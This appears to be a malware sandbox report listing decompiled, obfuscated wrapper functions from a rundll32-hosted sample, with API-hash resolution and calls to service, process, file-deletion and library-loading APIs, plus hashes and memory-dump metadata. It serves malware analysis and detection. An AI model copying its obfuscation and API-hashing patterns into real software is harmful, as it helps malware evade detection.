Snapshot File: hcaresult_10_2_230000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 98202d1760a7fff82657aed4a5d7fd5f1196688f7f282afeb6b2d7103732bb22
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: B0F04FB0C11208FFDB08DFA0E94789EBFB8EB40300F208198E509A7260E7715F559F55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2884 Parent PID: 2808 rundll32.exeCOMMON

Executed Functions

Function 00272959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00272959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0027602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002807A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0027295f
0x00272964
0x00272967
0x0027296a
0x0027296d
0x0027296e
0x0027296f
0x00272977
0x00272985
0x0027298a
0x00272992
0x0027299a
0x002729a2
0x002729a9
0x002729b0
0x002729b7
0x002729bb
0x002729cf
0x002729dc
0x002729e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002729DC

Strings

<^, xrefs: 00272977

Memory Dump Source

Source File: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000B.00000002.2109871560.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2109961520.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 23d533029c3056aabe95aed0a0a9b438db4a3eeeeaaebe737ea5bdb30237e692
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: A8016D72A01108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0027C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0027C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0027602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002807A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0027c6e1
0x0027c6e6
0x0027c6f0
0x0027c6fc
0x0027c703
0x0027c706
0x0027c70d
0x0027c711
0x0027c715
0x0027c71c
0x0027c723
0x0027c72a
0x0027c731
0x0027c738
0x0027c751
0x0027c762
0x0027c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0027C762

Strings

/O, xrefs: 0027C6E6

Memory Dump Source

Source File: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000B.00000002.2109871560.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2109961520.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 4934cc63de34540049d58cd22dfaecafe2c44dd235de8f7cee2a288c4fcd6884
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 8F1133B290222DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00271000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00271000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0027602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002807A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00271006
0x00271009
0x0027100c
0x00271011
0x00271016
0x0027101d
0x00271026
0x0027102d
0x00271034
0x0027103b
0x00271047
0x0027104f
0x00271057
0x0027105e
0x00271065
0x0027106c
0x00271073
0x00271077
0x0027108b
0x00271096
0x0027109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00271096

Strings

[, xrefs: 0027103B

Memory Dump Source

Source File: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000B.00000002.2109871560.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2109961520.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: cb5d1f7e7c77c56ae6f7c60883998667d5e1ccb51de3edb52ae8abe7d7fdd84a
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: F7015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B689B91

Uniqueness

Uniqueness Score: -1.00%

Function 00274859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00274859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002807A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0027485e
0x0027487a
0x0027487d
0x00274884
0x0027488b
0x00274892
0x0027489d
0x002748a0
0x002748ad
0x002748b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002748B7

Strings

[, xrefs: 0027488B

Memory Dump Source

Source File: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000B.00000002.2109871560.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2109961520.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 29cc95b77f91dd26d4372fbf7ca8f9429afc5be4d3e0f6f1ef3b1c709b7f5037
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 83F017B0A15209FBDB44CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F549B50

Uniqueness

Uniqueness Score: -1.00%

Function 00284F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00284F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0027602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002807A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00284f80
0x00284f81
0x00284f82
0x00284f86
0x00284f87
0x00284f8c
0x00284fa5
0x00284fa8
0x00284faf
0x00284fb6
0x00284fc7
0x00284fca
0x00284fd7
0x00284fe2
0x00284fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00284FE2

Strings

{#lm, xrefs: 00284FC2

Memory Dump Source

Source File: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000B.00000002.2109871560.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2109961520.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 81d8b0cbe170351add54bc97a8067ea70379330acb0679ff67c19b6f1c515823
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: F2F037B081220CFFDB04EFA4D98689EBFBAEB44300F208199E808AB250D3715B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 0028976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E0028976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0027602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002807A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00289772
0x00289773
0x00289778
0x0028977a
0x0028977b
0x0028977e
0x0028977f
0x00289782
0x00289785
0x00289788
0x00289789
0x0028978c
0x0028978f
0x00289790
0x00289791
0x00289794
0x00289797
0x0028979a
0x0028979d
0x002897a0
0x002897a3
0x002897a6
0x002897a7
0x002897a8
0x002897ad
0x002897b7
0x002897c3
0x002897ca
0x002897d1
0x002897d8
0x002897df
0x002897e3
0x002897fc
0x00289816
0x0028981d

APIs

CreateProcessW.KERNEL32(0027591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0027591A), ref: 00289816

Memory Dump Source

Source File: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000B.00000002.2109871560.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2109961520.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 71d372d6eeb36552ba429c1e51a1e5a4d21d2ea10996de98c2c02c4b4e0f3351
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: B511B372911148BFDF599F96DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0027B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0027B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0027602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002807A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0027b569
0x0027b56a
0x0027b56d
0x0027b572
0x0027b574
0x0027b577
0x0027b57a
0x0027b57d
0x0027b580
0x0027b583
0x0027b586
0x0027b587
0x0027b58a
0x0027b58d
0x0027b590
0x0027b593
0x0027b594
0x0027b595
0x0027b59a
0x0027b5a4
0x0027b5b8
0x0027b5c0
0x0027b5c4
0x0027b5cb
0x0027b5d2
0x0027b5d9
0x0027b5e6
0x0027b5fd
0x0027b604

APIs

CreateFileW.KERNELBASE(00280668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00280668,?,?,?,?), ref: 0027B5FD

Memory Dump Source

Source File: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000B.00000002.2109871560.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2109961520.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 6a5fb35de188177de2f78cb3aff3be9eb9857be4b73b987a09397710c5cca1f6
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 5211B272801248BBDF56DF95DD06CEE7F7AFF89314F148198FA1862160D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0028981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0028981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0027602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002807A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00289821
0x00289822
0x00289825
0x00289828
0x0028982a
0x0028982c
0x0028982f
0x00289832
0x00289835
0x00289836
0x00289837
0x0028983c
0x00289855
0x00289858
0x0028985f
0x00289866
0x0028986d
0x00289874
0x0028987b
0x0028988e
0x0028989b
0x002898a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002787F2,0000CAAE,0000510C,AD82F196), ref: 0028989B

Memory Dump Source

Source File: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000B.00000002.2109871560.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2109961520.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 48b4110e36b1443f9121bbed435ee8175c118321d8aafb5fc0ad7413a4ade397
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 7D019A76801208FBDB04EFD5DC46CDFBF79EF85310F108188F908A6220E6715B219BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00287BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00287BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0027602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002807A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00287bf7
0x00287bf8
0x00287bfa
0x00287bfd
0x00287bff
0x00287c02
0x00287c06
0x00287c07
0x00287c0f
0x00287c1d
0x00287c25
0x00287c2d
0x00287c31
0x00287c38
0x00287c3f
0x00287c46
0x00287c4a
0x00287c5e
0x00287c67
0x00287c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00287C67

Memory Dump Source

Source File: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000B.00000002.2109871560.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2109961520.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: c88058e3f956a201e62ac8fefa26631285943e80a9dd8f5ce2b7d9d9758d511d
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 56014FB190120CFFEB09DF94C84A8DEBBB5EF44314F108198F40567240E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0027F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0027F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0027602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002807A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0027f662
0x0027f663
0x0027f665
0x0027f668
0x0027f66a
0x0027f66d
0x0027f670
0x0027f673
0x0027f677
0x0027f678
0x0027f67d
0x0027f687
0x0027f693
0x0027f69a
0x0027f6a1
0x0027f6a5
0x0027f6a9
0x0027f6b0
0x0027f6c9
0x0027f6d8
0x0027f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0027F6D8

Memory Dump Source

Source File: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000B.00000002.2109871560.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2109961520.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 4a315a5291038ea88c2fb2798cf444c4ab9c44c8d5ed0b15817a42d35b9cb1eb
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: CB01E5B6901208BFEF05AF94DC4A8DF7F75EB05324F148188F90462250D6B25E21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0027B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0027B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0027602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002807A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0027b6f3
0x0027b6f8
0x0027b702
0x0027b70b
0x0027b712
0x0027b719
0x0027b720
0x0027b727
0x0027b72e
0x0027b747
0x0027b759
0x0027b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0027B759

Memory Dump Source

Source File: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000B.00000002.2109871560.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2109961520.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 39425e63c0c223bbfd320331d13a9d3338563cc64aed30bfe319847f9b174ec7
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 120178B6941308FBEB45DF90DD06A9E7BB5EB08704F108188FA09261A0D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0028AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0028AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0027602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002807A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0028aa3f
0x0028aa40
0x0028aa41
0x0028aa44
0x0028aa47
0x0028aa4b
0x0028aa4c
0x0028aa51
0x0028aa5b
0x0028aa64
0x0028aa68
0x0028aa6f
0x0028aa76
0x0028aa8d
0x0028aa90
0x0028aa9d
0x0028aaa8
0x0028aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0028AAA8

Memory Dump Source

Source File: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000B.00000002.2109871560.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2109961520.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: de235b87c96ac636f0eef76f87fa29bbb056d4babdaad4044c6ed165612fae49
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 8CF069B591020CFFDF08EF94DD4A89EBFB4EB44304F108088F805A6250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00275FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00275FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
